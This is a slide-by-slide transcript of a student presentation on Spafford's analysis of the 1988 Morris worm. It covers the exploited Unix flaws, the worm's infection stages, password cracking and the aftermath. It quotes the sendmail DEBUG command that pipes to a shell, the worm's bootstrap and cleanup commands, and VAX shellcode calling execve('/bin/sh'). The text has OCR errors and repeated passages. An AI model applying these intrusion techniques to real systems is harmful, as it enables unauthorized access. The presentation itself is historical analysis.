Crisis and Aftermath Eugene H. Spafford

Crisis and Aftermath Eugene H. Spafford
Timo Strauch & Sebastian Poth

Paper Presentation – Distributed Information Processing
Agenda History 1 Foundations Worm vs. Virus Flaws of the Systems: Finger(d), Sendmail, Passwords, Trusted Logins 2 Functionality of the Morris Worm High-Level Description Detailed Functionalities 3 4 Aftermath Paper Presentation – Distributed Information Processing

History 9 p.m., Nov. 3., 1988 Another simple, effective method of stopping the invading program Berkley group provided patches to mend all the flaws Collected host, network and user information and used them to break into other machines Some of the machines were unable to continue any processing Machines became more and more loaded with repeated infection Analyze the code and discover who unleashed it 5 a.m., Nov. 3., 1988 Computer Systems Research Group at Berkeley had developed a set of steps to halt its spread Only two types of machines: Sun Microsystems Sun 3 systems VAX computers with versions of 4BSD UNIX November 2, 1988, sometime after 5 p.m. a program was executed on one or more hosts connected to the internet Program collected host, network and user data Using flaws present in those systems software to break into other machines Sun Microsystems Sun 3 systems and VAX computers running variants of 4 BSD UNIX Unusual files in /usr/tmp Strange msgs appeared in log-files of some of the utilities, such as the sendmail handling agent Systems became more and more loaded with running processes Became so loaded, that they were unable to continue any processing November 3, 1988, 5 a.m. Personnel of University of California and MIT captured first copies of the program and began to analyze it After 12 hours the Computer Systems Research Group had developed an interim set of steps to halt its spread –> published it through Mailing lists and Usenet November 3, 1988, 9 p.m. Another simple, effective method of stopping the invading program without altering system utilities At the same time the Berkley group provided patches to mend all the flaws Following weeks Other well-publicized computer break-ins occurred Early morning, Nov. 3., 1988 First “captures” of the program and analyzation by the University of California at Berkeley and MIT 5 p.m., Nov. 2, 1988 A program was executed on one or more hosts connected to the internet Paper Presentation – Distributed Information Processing

Worm vs. Virus Worm Virus ü X Independence in running? How it spread?
Can use a network to replicate itself Rely on users transferring infected files/programs When invoked? Itself When infected program is running Target Several System Target Machine Not in the paper, see [1] Paper Presentation – Distributed Information Processing

Flaws of the Systems: Finger(d)
Allows users to obtain information (full name, login name, …) about other users Runs as a daemon to service remote requests (fingerd) Flaw only works on VAX machines, not on SUNs Overrunning buffer Get-call takes input to a buffer without checking any bounds Rewrite stack frame Overflow resulted in the return stack frame for the main routine being changed The finger program is a utility that allows users to obtain information about other users. It is usually used to identify the full name or login name of a user, whether or not a user is currently logged in, and possibly other information about the person such as telephone numbers where he or she can be reached. The fingerd program is intended to run as a daemon, or background process, to service remote requests using the finger protocol [5]. This daemon program accepts connections from remote programs, reads a single line of input, and then sends back output matching the received request. Bug: Buffer overflow the daemon used for input. Reads input without checking any bounds -> overran the buffer allocated for it and rewrote the stack frame As will be explained later, the input overran the buffer allocated for it and rewrote the stack frame thus altering the behavior of the program. A connection was established to the remote finger server daemon and then a specially constructed string of 536 bytes was passed to the daemon, overflowing its input buffer and overwriting parts of the stack. For standard 4BSD versions running on VAX computers, the overflow resulted in the return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack. That is, the code executed when the main routine attempted to return was: execve(“/bin/sh”, O, O) Altering behavior of program Execute specific code instead Paper Presentation – Distributed Information Processing

Flaws of the Systems: Sendmail
Mailer designed to route mail in a heterogeneous inter-network Runs in various modes, but worm exploited the daemon mode in combination with the debug mode: Sendmail is listening on port #25 for attempts to deliver mail using SMTP Worm contacted the port #25 of victim machine Issued the DEBUG functionality Specified a set of commands instead of user address DEBUG-mode was often used and often left turned on by vendors and administrators Paper Presentation – Distributed Information Processing

Flaws of the Systems: Passwords
Key attack of the worm involved attempts to discover user passwords Encrypted password of each user was in a publicly readable file (permuted version of the DES) Encrypt possible passwords Compare against the actual password without any system calls Try common words/combinations until a match is found Using password lists and dividing task among multiple processors The password is encrypted using a permuted version of the Data Encryption Standard (DES) algorithm, and the result is compared against a previously encrypted version present in a word-readable accounting file. If a match occurs, access is allowed. No plaintext passwords are contained in the file, and the algorithm is supposedly noninvertible without knowledge of the password. The organization of -the passwords in UNIX allows nonprivileged commands to make use of information stored in the accounts file, including authentication schemes using user passwords. However, it also allows an attacker to encrypt lists of possible passwords and then compare them against the actual passwords without calling any system function. In effect, the security of the passwords is provided by the prohibitive effort of trying this approach with all combinations of letters. Unfortunately, as machines get faster, the cost of such attempts decreases. Dividing the task among multiple processors further reduces the time needed to decrypt a password. Such at tacks are also made easier when users choose obvious or common words for their passwords. An attacker need only try lists of common words -until a match is found. The worm used such. an attack to break passwords. It used lists of words, including the standard online dictionary, as potential passwords. It encrypted them using a fast version of the password algorithm and then compared the result against the contents of the system file. The worm exploited the accessibility of the file coupled with the tendency of users to choose common words as their passwords. Some sites reported that over 50 percent of their passwords were quickly broken by this simple approach Worm exploited accessibility of password file coupled with the tendency of users to choose common words as passwords Paper Presentation – Distributed Information Processing

Flaws of the Systems: Trusted Logins
BSD UNIX-Based networking code is the ability to execute tasks on remote machines List of host/login that are assumed to be “trusted”, in the sense that a remote access never asked for a password Worm examined files that listed machine/logins used by the host Often, machines and accounts are reconfigured reciprocal trust A related flaw exploited by the worm involved the use of trusted logins. One of the most useful features of BSD UNIX-based networking code is the ability to execute tasks on remote machines. To avoid having to repeatedly type passwords to access remote accounts, it is possible for a user to specify a list of host/login name pairs that are assumed to be “trusted,” in the sense that a remote access from that host/login pair is never asked for a password. This feature has often been responsible for users gaining unauthorized access to machines (cf. [ll]), but it continues to be used because of its great convenience. The worm exploited the mechanism by locating machines that might “trust” the current machine/login being used by the worm. This was done by examining files that listed remote machine/logins used by the host3 Often, machines and accounts are reconfigured for reciprocal trust. Remote machines: Victim/User1 … Trusted machines: Server/User1 … User1 User2 Paper Presentation – Distributed Information Processing

Morris Worm: High-Level Description
Main Program Two versions: Sun 3 and VAX Collect information about users and possible victims Read public configuration files and run system utility programs Save those information Use the described flaws to spread itself among the network by transferring the vector program Vector Program Small program (99 lines in C) Transferred and invoked on the victim machine Transfers the main program to new victim Different names: Vector or grappling hook program L1.c program Paper Presentation – Distributed Information Processing

Current situation: Infection of a server is completed and main program starts working 1. Gather information about network interfaces (incl. reachability tests) List of Target Machines Host A … 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User/Password/Hosts User1/abc/Host A, Host B … Paper Presentation – Distributed Information Processing

Current situation: Infection of a server is completed and main program starts working List of Target Machines Host A … 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 5. Main-Program Features and Survival 1. Gather information about network interfaces (incl. reachability tests) 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User/Password/Hosts User1/abc/Host A, Host B … 4. Transfer and execute vector program, which re-connects to server and transfer the main-program Paper Presentation – Distributed Information Processing

Morris Worm: Gather Information
1. Gather information about network interfaces (incl. reachability tests) … Host A List of Target Machines Gather information about network interfaces Local “ioctl” and “netstat” calls with various arguments Add information about possible hosts into worm’s database Reachability tests by telnet and rexec Based on list of directly connected hosts List of Target Machines Host A … Paper Presentation – Distributed Information Processing

Morris Worm: Infection attempts
1. Gather information about network interfaces (incl. reachability tests) … Host A List of Target Machines 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail Main Goal: Open Remote Shell or directly transfer Vector Program Directly use RSH – Remote Shell Finger daemon (only on VAXs, on Sun core dump) Connect to remote daemon and pass 536 bytes string Overflowing its input buffer and overwriting parts of the stack Return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack Remote execute “execve(“/bin/sh”, 0, 0)”, which opens remote shell Sendmail Get into a dialog with sendmail daemon (Port #25) DEBUG-Mode Execute commands via the user address field (“rcpt to”) Vector program in the data part of the mail Local shell on victim machine create, compile and execute vector program ü As soon as one method succeeded the host entry in internal list marked as “infected” Paper Presentation – Distributed Information Processing

Morris Worm: 5 State Machine
1. Gather information about network interfaces (incl. reachability tests) … Host A List of Target Machines 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts Collect information about users and hosts Files to find hosts: /etc/hosts.equiv, .forward file File to find users/passwords: /etc/passwd Account:abskjdhfksf:100:5:User, Name:/usr/account:/bin/sh accountname password UserID GroupID UserInfo Home account Break passwords: By using simple choice based on: By using an internal dictionary (432 words) By using the UNIX online dictionary File: /usr/dict/words Paper Presentation – Distributed Information Processing

Morris Worm: 5 State Machine
1. Gather information about network interfaces (incl. reachability tests) … Host A List of Target Machines 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts Once a password is broken (“Infinite State 5”): Break into remote machines where that user had accounts: Scan files: .forward and .rhosts Remote shell by rexec remote command execution service Authentication with username/password is possible, because users often have the same password on their accounts on multiple machines Use local authentication Rexec to local host (authentication with local username/pw) RSH to the remote machine (authentication with username) Success if remote machine had a hosts.equiv file or the user had a .rhosts file that allow remote execution without password Paper Presentation – Distributed Information Processing

Morris Worm: Vector Program
1. Gather information about network interfaces (incl. reachability tests) List of Target Machines … Host A 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts 4. Transfer and execute vector program, which re-connects to server and transfer the main-program Based on the infection attempt that was successful the code of the vector program is copied, compiled and executed: Remote Shell established: Connection to sendmail daemon established: PATH=/bin:/usr/bin:/usr/ucb cd; /usr/tmp echo gorch49; sed '/int zz/q' > x O.c; echo gorch50 [text of vector program] int zz; cc -o z x c; ./x ; rm -f x x O.c; echo DONE debug mail from: (/dev/null) rcpt to: (“|sed -e ‚1,/^$/'d| /bin/sh; exit 0") data cd /usr/tmp cat > x c << 'EOF' EOF cc -o x x c; rm -f x x c quit Paper Presentation – Distributed Information Processing

Morris Worm: Vector Program
1. Gather information about network interfaces (incl. reachability tests) List of Target Machines … Host A 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts 4. Transfer and execute vector program, which re-connects to server and transfer the main-program ./x ; Vector Program connect to host machine on the specified port authenticated with magic number Magic number acted as an one-time challenge password Worm on the host machines waits up to 2 min for response Connection established, then transferring 3 files: Sun 3 binary version of the worm VAX version of the worm Source code of the vector program Vector program becomes a shell (via execl call) Paper Presentation – Distributed Information Processing

Morris Worm: Main-Program Initiation
1. Gather information about network interfaces (incl. reachability tests) List of Target Machines … Host A 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts 4. Transfer and execute vector program, which re-connects to server and transfer the main-program 5. Main-ProgramInstantiation and “hiding itself “ For each object files, the worm tries to build an executable object Sun 3 binary version of the worm VAX version of the worm If one of the files successfully executed, the worm close the connection to the victim Otherwise it clears away all evidence of the attempt at infection ü Victim machine is infected! Paper Presentation – Distributed Information Processing

Morris Worm: Main-Program Features
1. Gather information about network interfaces (incl. reachability tests) List of Target Machines … Host A 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts 4. Transfer and execute vector program, which re-connects to server and transfer the main-program 5. Main-ProgramInstantiation and “hiding itself “ Check if there is any other instance of the worm running on this machine Connecting to a local, predetermined TCP socket If connection succeeded one of the worms (randomly) set its “pleasequit” variable to 1 The worm exit after breaking user passwords with own dictionary (not immediately, delay of exit) “Self-Check” failed when server load is too high Often multiple versions of the worm running on the same machine Check in parallel to the other procedures if there is any other instance of the worm running on this machine by connected to a local, predetermined TCP socket if connection succeeded one of the worms (randomly) set its “pleasequit” variable to 1 Causing that the worm exit after breaking user passwords with own dictionary (not immediately!) “self-test” failed when serverload is too high therefore often times there were multiple versions of the worm running on the same machine Paper Presentation – Distributed Information Processing

Morris Worm: Main-Program Survival
1. Gather information about network interfaces (incl. reachability tests) List of Target Machines … Host A 2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail 3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data User1/abc/Host A, Host B User/Password/Hosts 4. Transfer and execute vector program, which re-connects to server and transfer the main-program 5. Main-ProgramInstantiation and “hiding itself “ After successful infection: Read all binary files into memory and delete all files on the disk “Self-Check” enables simple counter attack: Fake worm on the TCP port 1 out of 7 worms would become immortal, even if there were other instances running Many machines were overloaded with copies of the worm The worm would periodically fork itself and kill its parent process Scheduler would lower priorities of long running processes, thus forking itself it would retain normal scheduling priority Keep changing its process identifier, thus one could not observe on process accumulating massive amounts of CPU time Every 12 hours: Flush internal tables and re-infect the same machine Th.e new worm on the infected host proceeded to “hide” itself by obscuring its argument vector, unlinking the bins ry version of itself, and killing its parent (the $$ argument in the invocation). It then read into memc ry each of the worm binary files, encrypted each file after reading it, and deleted the files from disk. Paper Presentation – Distributed Information Processing

Aftermath – Damage Morris worm was the first computer worm Around 6000 major UNIX machines were infected (10% of the network at that time) Important nation-wide gateways were shutdown No code present in the worm that would explicitly damage any system and no mechanism to stop “Offensive” Functionality: Send every 15 infections an uninitialized byte message to ernie.berkely.edu The code was incorrect and never transferred any data Speculations: monitoring process or he simply wanted to cast suspicion on Berkeley Paper Presentation – Distributed Information Processing

Aftermath – Who and Why? Primary Questions: Who and Why? Robert T. Morris (Graduate Student at Cornell Uni) No statement form Morris, only speculations: Revenge against his father Impress people Prank Experiment gone awry Not in the paper: “…to figure out how big the Internet was…” [2] Consequences: Topic debated: Punishment? Not in the paper: 400h of community service & $10,000 [2] Coupled with this tendency to assume mot:ive, we have observed very different opinions on the punishment, if any, to mete out to the author. One oftexpressed opinion, especially by those individuals who believe the worm release was an accident or .an unfortunate experiment, is that the author should not be punished. Some have gone so far as to say that the author should be rewarded and the vendors amd operators of the affected machines should be the ones punished, this on the theory that they were sloppy about their security and somehow invited the abuse! The other extreme school of thought holds that the author should be severely punished, including a term in a federal penitentiary. (One somewhat humorous ex- ample of this point of view was espoused by syndicated columnist Mike Royko [IQ].) Paper Presentation – Distributed Information Processing

Aftermath - CERT NCSC post-mortem workshop: Recommendations: Formal crisis center After another attack: CERT (Computer Emergency Response Team) was established Purpose: To act as a central switchboard and coordinator for computer security emergencies on Arpanet and MILnet computers Not the whole “internet” (CSnet, Bitnet, NSFnet, and other internet communities) A significant conclusion reached at the NCSC postmortem workshop was that the reason the worm was stopped so quickly was due almost solely to the UNIX “old-boy” network, and not due to any formal mechanism in place at the time [lo]. A recommendation from that workshop was that a formal crisis center be established to deal with future incidents and to provide a formal point of contact for individuals wishing to report problems. No such center was established at that time. Paper Presentation – Distributed Information Processing

Aftermath – Fix the Problem
Both the Internet and UNIX helped to defeat the worm as well as spread it Communication and ability to copy source and binary files Fixing the problem not only means fixing the flaws - it… …should point out that we need a better mechanism in place to coordinate information about security flaws and attacks …should prompt us to think about the ethics and laws concerning access to computers Further, such an attitude wculcl be contrary to the whole purpose of having an open, research-oriented network. The worm was caused by a breakdown of ethics as well as lapses in security-a purely technological attempt at prevention will not address the full problem, and may just cause new difficulties The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to d.isseminate valuable information to sites that needed it. Many site administrators discovered the problem from reading newspapers or watching television. The major sources of information for many of the sites affected s;eems to have been Usenet news groups and a mailing list I put together when the worm was first discovered. Although useful, these methods did not ensure timely, widespread dissemination of useful information-especially since they depended on the Internet to work! Paper Presentation – Distributed Information Processing

Timo Strauch & Sebastian Poth
Thank You! Timo Strauch & Sebastian Poth

Literature: [1] differences.html [2] Paper Presentation – Distributed Information Processing

Appendix I – Call of the Main Program
The server worm send the following command stream to the connected shell: Then it would send the following form of command sequence: “rm” succeed only if the linked version of the worm failed to execution If the server determined that the host was now infected, it closed the connection. Otherwise, it would try the other binary file. After both binary files had been tried, it would send over “rm” commands for the object files to clear away all evidence of the attempt at infection PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh | then P=x else P=sh fi cc -o $P x ,sun3.o ./$P -p $$ x ,sun3.o x ,vax.o x ,11.c rm -f $P he server wor:n sent the following command stream to the connected shell: PATH… Then, for each binary file it had transferred (just two in this case although the code is written to allow more), it would send the following form of command sequence: cc…. h.e rm would succeed only if the linked version of the worm fai’.ed to start execution. If the server determined tha: the host was now infected, it closed the connection. Otherwise, it would try the other binary file. After both binary files had been tried, it would send over rm commands for the objec:t files to clear away all evidence of the attempt at infection. Paper Presentation – Distributed Information Processing

Appendix II – Details of Fingerd Flaw
The instructions that were written into the stack at that location were: That is, the code executed when the main routine attempted to return was: On VAXs, this resulted in the worm connected to a remote shell via the TCP connection pushl $68732f ‘/sh\0’ pushl $6e69622f ‘/bin’ movl sp, r10 pushl $0 pushl r10 pushl $3 movl sp, ap chmk $3b he server wor:n sent the following command stream to the connected shell: PATH… Then, for each binary file it had transferred (just two in this case although the code is written to allow more), it would send the following form of command sequence: cc…. h.e rm would succeed only if the linked version of the worm fai’.ed to start execution. If the server determined tha: the host was now infected, it closed the connection. Otherwise, it would try the other binary file. After both binary files had been tried, it would send over rm commands for the objec:t files to clear away all evidence of the attempt at infection. CHMK – Change mode to Kernel execve(“/bin/sh”, 0, 0) Paper Presentation – Distributed Information Processing

Appendix III – Fix the Flaws
Finger Program audits by various individuals have revealed other potential problems, and many patches have been circulated since November to deal with these flaws Sendmail Other flaws have been found and reported now that attention has been focused on the program, but it is not known for sure if all the bugs have been discovered and all the patches circulated Password Shadow password file: encrypted passwords are saved in a file (shadow) that is readable only by the system administrators, and a privileged call performs password encryptions and comparisons with an appropriate timed delay (0.5 to 1 second, for instance) Change the utility that sets user passwords: nontrivial passwords (restrictions) Trusted Logins: Current remote access mechanism should be removed and possibly replaced with something else Keberos authentication servers This scheme uses dynamic session keys that need to be updated periodically. Further, such an attitude wculcl be contrary to the whole purpose of having an open, research-oriented network. The worm was caused by a breakdown of ethics as well as lapses in security-a purely technological attempt at prevention will not address the full problem, and may just cause new difficulties The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to d.isseminate valuable information to sites that needed it. Many site administrators discovered the problem from reading newspapers or watching television. The major sources of information for many of the sites affected s;eems to have been Usenet news groups and a mailing list I put together when the worm was first discovered. Although useful, these methods did not ensure timely, widespread dissemination of useful information-especially since they depended on the Internet to work! Paper Presentation – Distributed Information Processing

Appendix IIII – Conclusion (Condt.)
Increasing the obstacles to open communication or decreasing the number of people with access to in depth information will not prevent a determined hacker It will only decrease the pool of expertise and resources available to fight such an attack Purely technological attempt at prevention will not address the full problem This attack should also point out that we need a better mechanism in place to coordinate information about security flaws and attacks The formation of the CERT may be a step in the right direction, but a more general solution is still needed The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to disseminate valuable information to sites that needed it. Many site administrators discovered the problem from reading newspapers or watching television The major sources of information for many of the sites affected seems to have been Usenet news groups and mailing lists Further, such an attitude wculcl be contrary to the whole purpose of having an open, research-oriented network. The worm was caused by a breakdown of ethics as well as lapses in security-a purely technological attempt at prevention will not address the full problem, and may just cause new difficulties The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to d.isseminate valuable information to sites that needed it. Many site administrators discovered the problem from reading newspapers or watching television. The major sources of information for many of the sites affected s;eems to have been Usenet news groups and a mailing list I put together when the worm was first discovered. Although useful, these methods did not ensure timely, widespread dissemination of useful information-especially since they depended on the Internet to work! Paper Presentation – Distributed Information Processing

Crisis and Aftermath Eugene H. Spafford

Similar presentations

Presentation on theme: "Crisis and Aftermath Eugene H. Spafford"— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

Crisis and Aftermath Eugene H. Spafford

Similar presentations

Presentation on theme: "Crisis and Aftermath Eugene H. Spafford"— Presentation transcript:

Similar presentations

About project

Feedback